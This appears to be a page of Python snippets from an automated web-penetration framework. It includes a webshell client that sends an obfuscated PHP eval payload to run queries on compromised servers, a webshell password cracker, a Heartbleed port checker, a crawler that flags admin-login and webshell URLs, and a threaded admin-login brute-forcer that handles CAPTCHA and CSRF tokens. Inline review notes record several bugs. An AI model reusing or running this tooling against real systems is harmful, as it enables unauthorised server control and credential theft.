Пример #1
def query(queryString):
    """POST *queryString* (base64-encoded) to the module-global ``url`` and return the reply body.

    Everything except ``queryString`` comes from module globals: ``mode``
    selects between a full first request (``mode == 1``) and a follow-up
    that only refreshes ``z4``; ``postData`` and ``httpHeaderContent`` are
    mutated in place, so they carry state from one call to the next; ``url``,
    ``chopperPass`` and the ``db*`` values are only read.

    Returns the UTF-8-decoded response with its first and last three
    characters dropped (the remote side presumably wraps its output in
    3-character delimiters — inferred from the slice, not shown here).
    """
    global mode
    global httpHeaderContent
    global dbHost, dbUser, dbPass, dbName, postData, url, chopperPass
    if mode == 1:
        # First request: connection parameters go into z1..z4 and a fixed,
        # chr()-obfuscated PHP snippet is stored under the ``chopperPass``
        # key.  Because that snippet is a constant, it is a stable signature
        # for request-body inspection (WAF/IDS) on the receiving side.
        postData[
            'z0'] = "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"
        postData['z1'] = dbHost
        postData['z2'] = dbUser
        postData['z3'] = dbPass
        postData['z4'] = dbName
        postData[
            chopperPass] = "$xx=chr(98).chr(97).chr(115).chr(101).chr(54).chr(52).chr(95).chr(100).chr(101).chr(99).chr(111).chr(100).chr(101);$yy=$_POST;@eval($xx($yy[z0]));"

        # Randomised headers plus a Referer derived from the target's own
        # origin, forced to a form-encoded content type.
        httpHeaderContent = get_random_header()
        httpHeaderContent['Referer'] = get_http_domain_from_url(url)
        httpHeaderContent['Content-Type'] = "application/x-www-form-urlencoded"

    else:
        # Follow-up call: assumes postData/httpHeaderContent were populated by
        # an earlier mode == 1 call (nothing here re-creates them).
        postData["z4"] = dbName

    # b64encode returns bytes, so z5 is a bytes value, not a str; post_requests
    # is expected to accept that (not verifiable from this excerpt).
    postData["z5"] = base64.b64encode(queryString.encode(encoding="utf-8"))
    result = post_requests(url, data=postData, headers=httpHeaderContent)
    html = result.content.decode("utf8")
    return html[3:-3]
Пример #2
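def _format_domain_rows(rows):
    """Render single-column ``http_domain`` rows as newline-terminated text.

    Returns ``"None\n"`` for an empty result set, matching the view's
    historical output.
    """
    if not rows:
        return "None\n"
    return "".join(row[0] + "\n" for row in rows)


def _looks_unsafe_for_sql_literal(value):
    """Return True if *value* contains characters that could end a quoted SQL literal.

    ``execute_sql_in_db`` takes a ready-made statement, so request input is
    interpolated as text; this check is a coarse stop-gap and not a
    substitute for bound parameters in that helper.
    """
    return any(ch in value for ch in ("'", '"', "\\", ";", "\x00"))


def targets(request):
    """Django view behind ``targets.html``.

    The ``action`` GET parameter selects one of:

    * ``query``  – list the ``http_domain`` column of the first-targets and
      targets tables as an HTML fragment (newlines rendered as ``<br>``);
    * ``add``    – insert ``targetValue`` (normalised through
      ``get_http_domain_from_url``) into the targets table;
    * ``delete`` – remove that ``http_domain`` row from the targets table;
    * anything else – render the plain page.

    ``targetValue`` is untrusted request input.  It is interpolated into SQL
    text by ``execute_sql_in_db`` and echoed back in the response, so values
    that could break out of a quoted literal are rejected and everything
    reflected into HTML is escaped.
    """
    from html import escape as _escape_html

    targetValue = request.GET.get('targetValue')
    action = request.GET.get('action')
    if targetValue is not None:
        print(targetValue)

    if action == "query":
        result1 = execute_sql_in_db(
            "select http_domain from %s" % first_targets_table_name, db_name)
        result2 = execute_sql_in_db(
            "select http_domain from %s" % targets_table_name, db_name)
        body = ("first targets:\n" + _format_domain_rows(result1) + "\n"
                + "targets:\n" + _format_domain_rows(result2))
        # Escape first (the stored domains originally came from this view's
        # input), then turn newlines into line breaks.
        return HttpResponse(_escape_html(body).replace("\n", "<br>"))

    if action in ("add", "delete"):
        if targetValue is None:
            return HttpResponse("targetValue is required for action=%s" % action)
        targetValue = get_http_domain_from_url(targetValue)
        if _looks_unsafe_for_sql_literal(targetValue):
            return HttpResponse(
                "rejected target value: %s" % _escape_html(targetValue))
        if action == "add":
            # ``domain`` is the last path-ish component of the normalised value.
            execute_sql_in_db(
                "insert into %s(http_domain,domain) values('%s','%s')" %
                (targets_table_name, targetValue, targetValue.split("/")[-1]),
                db_name)
            string = "add new target %s for scan successully:D" % _escape_html(targetValue)
        else:
            execute_sql_in_db(
                "DELETE FROM `%s` WHERE http_domain='%s'" %
                (targets_table_name, targetValue), db_name)
            string = "delete target %s from db successully:D" % _escape_html(targetValue)
        return HttpResponse(string)

    # No recognised action: this is the normal page render.
    print("normal visit without action request to targets.html")
    return render(request, "targets.html", {})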
Пример #3
def crack_webshell(url, anyway=1):
    """Try to determine a password for the suspected webshell at *url*.

    Returns a one-line summary string (``"webshell:<url>,password:<pw>"`` on
    success, a "not a webshell" message otherwise) or ``""`` when the
    direct_bao attempt fails.

    Original comment (translated): the second parameter "defaults to 0"; a
    non-zero value skips the is-it-a-webshell decision — 1 forces the
    direct_bao path, 2 the biaodan_bao path.
    NOTE(review): the signature actually defaults ``anyway`` to 1, so callers
    that omit it always take the direct_bao branch regardless of ``tmp['y2']``.
    """

    figlet2file("cracking webshell", 0, True)
    print("cracking webshell --> %s" % url)
    print("正在使用吃奶的劲爆破...")

    ext = get_webshell_suffix_type(url)
    tmp = check_webshell_url(url)
    # NOTE(review): url_http_domain is never read in this function.
    url_http_domain = get_http_domain_from_url(url)
    # NOTE(review): this condition has no effect — its body is ``pass``.
    if tmp['y2'] == 'direct_bao' or tmp['y2'] == 'biaodan_bao':
        pass

    if anyway == 1 or tmp['y2'] == "direct_bao":
        return_value = crack_ext_direct_webshell_url(
            url, ModulePath + "dicts/webshell_passwords.txt", ext)
        if return_value['cracked'] == 0:
            print("webshell爆破失败 :(")
            return ""
        else:
            # On success, record the webshell password information so it can
            # be stored in the cracked_webshell_urls_info column of the
            # corresponding non-urls table (the write happens in the caller).
            strings_to_write = "webshell:%s,password:%s" % (
                url, return_value['password'])
    elif anyway == 2 or tmp['y2'] == "biaodan_bao":
        # NOTE(review): the biaodan_bao path is disabled (the code below is a
        # string literal, not executed), so this branch leaves
        # ``strings_to_write`` unbound and the ``return`` at the end raises
        # UnboundLocalError when it is taken.
        pass
        '''
        return_value = crack_allext_biaodan_webshell_url(
            url, ModulePath + "dicts/user.txt", ModulePath + "dicts/webshell_passwords.txt")
        if return_value['cracked'] == 0:
            print("webshell爆破失败 :(")
            return ""
        else:
            # 爆破成功将cracked_webshell_url_info标记为webshell密码信息,并将webshell密码信息加入到相应表中的
            # cracked_webshell_urls_info字段中
            strings_to_write = "webshell:%s,password:%s" % (
                url, return_value['password'])
         '''
    elif tmp['y2'] == "bypass":
        print(
            Fore.RED +
            "congratulations!!! webshell may found and has no password!!!")
        string = "cracked webshell:%s no password!!!" % url
        print(Fore.RED + string)

        # Record the result for the cracked_webshell_urls_info column of the
        # corresponding table (the write happens in the caller).
        # NOTE(review): ``return_value`` is only assigned in the direct_bao
        # branch above, so this read raises UnboundLocalError; ``string``
        # (built just above) is the value that was presumably intended.
        strings_to_write = "webshell:%s,password:%s" % (
            url, return_value['password'])
    else:
        strings_to_write = "这不是一个webshell :("

    return strings_to_write
Пример #4
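import os
import re
import shlex
import sys

# exp10it lives in a per-user checkout; it has to be on sys.path before the
# ``from exp10it import ...`` lines below are executed.
exp10it_module_path = os.path.expanduser("~") + "/mypypi"
sys.path.insert(0, exp10it_module_path)
from urllib.parse import urlparse
from exp10it import get_string_from_command
from exp10it import CLIOutput
from exp10it import get_target_table_name_list
from exp10it import COMMON_NOT_WEB_PORT_LIST
from exp10it import get_http_domain_from_url
from exp10it import get_target_open_port_list

# Usage: <script> <target-url>
# Runs the bundled ssltest.py (Python 2) once per open port that is not in
# COMMON_NOT_WEB_PORT_LIST and reports every port whose output matches
# "server is vulnerable".
current_dir = os.path.split(os.path.realpath(__file__))[0]
target = sys.argv[1]
print("checking heartbleed vul for " + target)

parsed = urlparse(target)
hostname = parsed.hostname
if hostname is None:
    # urlparse only yields a hostname when a scheme is present.
    sys.exit("cannot parse a hostname from %r (expected e.g. http://host:port)" % target)
target_table_name = get_target_table_name_list(target)[0]

# One lookup is enough; the list was previously fetched twice.
open_port_list = get_target_open_port_list(target)
if ":" in parsed.netloc:
    open_port_list.append(parsed.netloc.split(":")[1])

for each in open_port_list:
    if each in COMMON_NOT_WEB_PORT_LIST:
        continue
    # ``target`` comes from argv and is spliced into a shell command line, so
    # every interpolated piece is shell-quoted.
    command = "cd %s && python2 ssltest.py -p %s %s " % (
        shlex.quote(current_dir), shlex.quote(str(each)), shlex.quote(hostname))
    a = get_string_from_command(command)
    if re.search(r"server is vulnerable", a, re.I):
        string_to_write = "Congratulations! heartbleed vul exists on %s:%s" % (
            hostname, each)
        CLIOutput().good_print(string_to_write)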
Пример #5
    def parse_get(self, response):
        """Splash callback for a GET response: yield one CrawlerItem, then queue follow-up requests.

        The item carries the status code, the url, title/content, the
        resource-file urls seen on the page, sub-domains of the main target
        the page links to, and two boolean hints (``like_admin_login_url``,
        ``like_webshell_url``).  Each link is then filtered (same host as
        ``self.domain``, not already collected, no already-collected url
        template) and re-queued as a SplashRequest: ``<url>^<body>`` links
        are POSTed to ``parse_post``, resource files are recorded on the
        item, logout-like urls are dropped, everything else comes back here.
        """
        item = CrawlerItem()
        item['code'] = response.status
        item['current_url'] = response.url

        item['resources_file_list'] = []
        item['sub_domains_list'] = []
        item['like_admin_login_url'] = False
        item['like_webshell_url'] = False

        if response.status == 200:
            urls = collect_urls_from_html(response.text, response.url)
            title_list = response.xpath('//title/text()').extract()
            item['title'] = None if len(title_list) == 0 else title_list[0]
            item['content'] = response.text
        else:
            # Non-200 through Splash: fetch the page again directly with the
            # spider's cookie and take title/content/links from that reply.
            a = get_request(response.url, cookie=self.cookie)
            item['title'] = a['title']
            item['content'] = a['content']
            urls = collect_urls_from_html(a['content'], response.url)

        # NOTE(review): the two ``== True`` lines below are comparisons whose
        # result is discarded, so both flags keep the False set above; an
        # assignment (``= True``) looks intended.
        if like_admin_login_content(item['content']):
            item['like_admin_login_url'] == True
        if check_url_has_webshell_content(item['current_url'], item['content'],
                                          item['code'], item['title'])['y1']:
            item['like_webshell_url'] == True

        yield item

        url_main_target_domain = get_url_belong_main_target_domain(
            self.start_url)

        for url in urls:
            url_templet_list = get_url_templet_list(url)
            url_http_domain = get_http_domain_from_url(url)
            # Collect sub-domains of the main target, compared under the
            # link's own scheme.
            # NOTE(review): the item was already yielded above; whether these
            # later appends are visible to the pipeline depends on when it
            # runs relative to this generator — confirm.
            if url_is_sub_domain_to_http_domain(
                    url,
                    urlparse(url)[0] + "://" + url_main_target_domain
            ) and url_http_domain not in item['sub_domains_list']:
                item['sub_domains_list'].append(url_http_domain)
            # Only follow links on the spider's own host.
            if urlparse(url).hostname != self.domain:
                continue
            if url in self.collected_urls:
                continue
            # Skip the url if any of its templates was already collected.
            _flag = 0
            for _ in url_templet_list:
                if _ in self.collected_urls:
                    _flag = 1
                    break
            if _flag == 1:
                continue

            self.add_url_templet_to_collected_urls(url)

            if "^" in url:
                # POST-style url: "<url>^<body>"
                post_url_list = url.split("^")
                post_url = post_url_list[0]
                post_data = post_url_list[1]
                yield SplashRequest(post_url,
                                    callback=self.parse_post,
                                    endpoint='execute',
                                    magic_response=True,
                                    meta={
                                        'handle_httpstatus_all': True,
                                        'current_url': url
                                    },
                                    args={
                                        'lua_source': self.lua_script,
                                        'http_method': 'POST',
                                        'body': post_data
                                    })
            else:
                # GET-style url
                match_resource = re.match(RESOURCE_FILE_PATTERN, url)
                match_logoff = re.search(
                    r"(logout)|(logoff)|(exit)|(signout)|(signoff)", url, re.I)
                if match_resource:
                    item['resources_file_list'].append(url)
                elif match_logoff:
                    # Never request logout-like urls: doing so would drop the
                    # crawl's session.
                    pass
                else:
                    yield SplashRequest(url,
                                        self.parse_get,
                                        endpoint='execute',
                                        magic_response=True,
                                        meta={'handle_httpstatus_all': True},
                                        args={'lua_source': self.lua_script})
Пример #6
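    def process_item(self, item, spider):
        """Persist one crawled ``item`` and return it unchanged.

        Writes, in order:

        1. ``code``/``title``/``content`` and the two ``like_*`` flags into
           the per-target ``*_urls`` table, keyed by ``url``;
        2. ``resources_file_list`` plus the ``like_admin_login_urls`` /
           ``like_webshell_urls`` columns into the pang/sub/targets table(s)
           that ``get_target_table_name_info`` assigns the url to;
        3. for a main target with a non-IP hostname, every new entry of
           ``sub_domains_list`` into the ``*_sub`` table and into
           ``<LOG_FOLDER_PATH>/sub/<sub_table_name>.txt``.

        ``sub_domains_list`` values originate from the crawled site and are
        treated as untrusted: the log file is appended with ``open`` rather
        than a shell ``echo``, and values that could break out of the quoted
        SQL literal are skipped until ``execute_sql_in_db`` takes bound
        parameters.
        """
        current_url = item['current_url']
        parsed = urlparse(current_url)
        hostname = parsed.hostname
        code = item['code']
        title = item['title']
        content = item['content']

        # "^" separates a POST url from its body (see the spider); the table
        # lookups only want the url part.  split()[0] is the whole string
        # when there is no "^".
        pure_url = current_url.split("^")[0]

        http_domain = get_http_domain_from_url(current_url)
        main_target_domain = get_url_belong_main_target_domain(pure_url)
        table_stem = main_target_domain.replace(".", "_")
        pang_table_name = table_stem + "_pang"
        sub_table_name = table_stem + "_sub"

        target_table_info = get_target_table_name_info(current_url)

        # url_start_url is only defined for non-pang/sub targets; the
        # ``target_is_main_*`` branches below are the ones that read it.
        url_start_url = None
        if not target_table_info['target_is_pang_or_sub']:
            url_start_url = get_url_start_url(pure_url)
            url_table_name = get_start_url_urls_table(url_start_url)
        else:
            url_table_name = get_http_domain_from_url(pure_url).split(
                "/")[-1].replace(".", "_") + "_urls"

        # 1.write [current_url],[code],[title],[content],[like_admin_login_url],[like_webshell_url] to database
        primary_key = "url"
        primary_value = current_url
        write_string_to_sql(str(code), DB_NAME, url_table_name, 'code',
                            primary_key, primary_value)
        write_string_to_sql(title, DB_NAME, url_table_name, 'title',
                            primary_key, primary_value)
        write_string_to_sql(content, DB_NAME, url_table_name, 'content',
                            primary_key, primary_value)
        if item['like_admin_login_url']:
            write_string_to_sql('1', DB_NAME, url_table_name,
                                'like_admin_login_url', primary_key,
                                primary_value)
        if item['like_webshell_url']:
            write_string_to_sql('1', DB_NAME, url_table_name,
                                'like_webshell_url', primary_key,
                                primary_value)

        # 2.write [resources_file_list],[like_admin_login_urls] && [like_webshell_urls],[sub_domains_list] to database

        # Pick the table(s) and key for the per-target columns.  Starting
        # from an empty list makes the loops below no-ops when no branch
        # matches, instead of raising UnboundLocalError.
        _table_name_list = []
        if target_table_info['target_is_pang_or_sub'] and not target_table_info[
                'target_is_pang_and_sub']:
            _table_name = pang_table_name if target_table_info[
                'target_is_only_pang'] else sub_table_name
            _table_name_list = [_table_name]
            primary_key = 'http_domain'
            primary_value = http_domain
        elif target_table_info['target_is_pang_and_sub']:
            _table_name_list = [pang_table_name, sub_table_name]
            primary_key = 'http_domain'
            primary_value = http_domain
        elif target_table_info['target_is_main_and_table_is_targets']:
            _table_name_list = [TARGETS_TABLE_NAME]
            primary_key = 'start_url'
            primary_value = url_start_url
        elif target_table_info['target_is_main_and_table_is_first_targets']:
            _table_name_list = [FIRST_TARGETS_TABLE_NAME]
            primary_key = 'start_url'
            primary_value = url_start_url

        # write [resources_file_list]
        for each in item['resources_file_list']:
            for each_table in _table_name_list:
                auto_write_string_to_sql(each, DB_NAME, each_table,
                                         "resource_files", primary_key,
                                         primary_value)

        # write [like_admin_login_urls] and [like_webshell_urls]
        for each_table in _table_name_list:
            if item['like_admin_login_url']:
                auto_write_string_to_sql(current_url, DB_NAME, each_table,
                                         "like_admin_login_urls", primary_key,
                                         primary_value)
            if item['like_webshell_url']:
                auto_write_string_to_sql(current_url, DB_NAME, each_table,
                                         "like_webshell_urls", primary_key,
                                         primary_value)

        # write [sub_domains_list] to database (main targets only; skipped for
        # dotted-quad hosts, which have no sub-domains to record).
        if (target_table_info['target_is_main'] and hostname is not None
                and not re.match(r"(\d+\.){3}\d+", hostname)):
            _result = execute_sql_in_db(
                "select http_domain from %s" % sub_table_name, DB_NAME)
            exist_sub_domains = {row[0] for row in _result}
            log_dir = os.path.join(LOG_FOLDER_PATH, "sub")
            log_path = os.path.join(log_dir, sub_table_name + ".txt")
            for each in item['sub_domains_list']:
                if each in exist_sub_domains:
                    continue
                # Crawled value: refuse anything that could close the quoted
                # literal below.  Proper fix is a parameterised query in
                # execute_sql_in_db.
                if any(ch in each for ch in ("'", '"', "\\", "\x00")):
                    print("skipping suspicious sub domain value: %r" % each)
                    continue
                domain = each.split("/")[-1]
                # write to database
                sql = "insert ignore into `%s`(http_domain,domain) values('%s','%s')" % (
                    sub_table_name, each, domain)
                execute_sql_in_db(sql, DB_NAME)
                # write to the per-sub-table log file (one domain per line)
                os.makedirs(log_dir, exist_ok=True)
                with open(log_path, "a", encoding="utf-8") as log_file:
                    log_file.write(domain + "\n")

        return item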
Пример #7
    def crack_admin_login_url_thread(url,username,password):
        if get_flag[0] == 1:
            return


        try_time[0] += 1
        if requestAction=="GET":
            final_request_url=form_action_url
            final_request_url=re.sub(r"%s=[^&]*" % user_form_name,"%s=%s" %
                    (user_form_name,username),final_request_url)
            final_request_url=re.sub(r"%s=[^&]*" % pass_form_name,"%s=%s" %
                    (pass_form_name,password),final_request_url)
            if has_yanzhengma[0]:
                if needOnlyGetOneYanZhengMa:
                    yanzhengmaValue=onlyOneYanZhengMaValue
                else:
                    yanzhengmaValue=get_one_valid_yangzhengma_from_src(yanzhengma_src)

                final_request_url=re.sub(r"%s=[^&]*" % yanzhengma_form_name,"%s=%s" %
                        (yanzhengma_form_name,yanzhengmaValue),final_request_url)
                if hasCsrfToken:
                    final_request_url=re.sub(r"%s=[^&]*" % csrfTokenName,currentCsrfTokenPart[0],final_request_url)

            html=s.get(final_request_url).text

            if hasCsrfToken:
                csrfTokenValue=get_csrf_token_value_from_html(html)
                currentCsrfTokenPart[0]=csrfTokenPart+csrfTokenValue
        else:
            #post request
            paramPartValue=form_action_url.split("^")[1]
            paramList=paramPartValue.split("&")
            values={}
            for eachP in paramList:
                eachPList=eachP.split("=")
                eachparamName=eachPList[0]
                eachparamValue=eachPList[1]
                if eachparamName==user_form_name:
                    eachparamValue=username
                if eachparamName==pass_form_name:
                    eachparamValue=password
                values[eachparamName]=eachparamValue

            if has_yanzhengma[0]:
                if not needOnlyGetOneYanZhengMa:
                    values[yanzhengma_form_name]=get_one_valid_yangzhengma_from_src(yanzhengma_src)
                else:
                    values[yanzhengma_form_name]=onlyOneYanZhengMaValue

            if hasCsrfToken:
                values[csrfTokenName]=re.search(r"[^=]+=(.*)",currentCsrfTokenPart[0]).group(1)

            html = s.post(form_action_url.split("^")[0], values).text

            if hasCsrfToken:
                csrfTokenValue=get_csrf_token_value_from_html(html)
                currentCsrfTokenPart[0]=csrfTokenPart+csrfTokenValue

        USERNAME_PASSWORD = "******" + username + ":" + \
                password + ")" + (52 - len(password)) * " "
        # 每100次计算完成任务的平均速度

        left_time = get_remain_time(
                start[0],
                biaoji_time[0],
                remain_time[0],
                100,
                try_time[0],
                sum[0])
        remain_time[0] = left_time

        sys.stdout.write('-' * (try_time[0] * 100 // sum[0]) + '>' + str(try_time[0] * 100 // sum[0]) +
                '%' + ' %s/%s  remain time:%s  %s\r' % (try_time[0], sum[0], remain_time[0], USERNAME_PASSWORD))

        sys.stdout.flush()


        if len(html) > logined_least_length:
            # 认为登录成功
            get_flag[0] = 1
            end = time.time()
            CLIOutput().good_print(
                    "congratulations!!! admin login url cracked succeed!!!", "red")
            string = "cracked admin login url:%s username and password:(%s:%s)" % (
                    url, username, password)
            CLIOutput().good_print(string, "red")
            return_string[0]=string
            print("you spend time:" + str(end - start[0]))
            http_domain_value = get_http_domain_from_url(url)
            # 经验证terminate()应该只能结束当前线程,不能达到结束所有线程
            table_name_list = get_target_table_name_list(http_domain_value)
            urls_table_name = http_domain_value.split(
                    "/")[-1].replace(".", "_") + "_urls"

            return {'username': username, 'password': password}